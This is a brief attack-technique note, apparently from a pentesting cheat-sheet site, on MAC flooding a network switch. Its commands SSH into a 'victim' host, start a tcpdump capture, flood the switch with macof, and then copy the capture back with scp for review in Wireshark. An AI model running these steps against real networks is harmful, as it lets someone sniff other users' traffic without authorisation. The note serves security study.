MAC Flooding Attack
Last modified: 2022-11-20
It is a technique that compromises the security of network switches.
Attack Flow
-
Open Two SSH Sessions
Start the SSH session 1 in terminal 1.
ssh victim@<target-ip>Start the SSH session 2 in terminal 2.
-
Flood the Switch and Capturing the Traffic
In the session 1, start tcpdump and keep it running.
tcpdump -A -i eth1 -w /tmp/tcpdump.pcapIn the session 2, start flooding the switch (here "eth1" interface).
macof -i eth1After about 30 seconds, stop macof and tcpdump.
-
Investigate the Captured Traffic
In your local machine, transfer the dumped file named "/tmp/tcpdump.pcap" from the target machine to your local machine.
scp victim@<target-ip>:/tmp/tcpdump.pcap .Investigate this file using Wireshark
wireshark ./tcpdump.pcap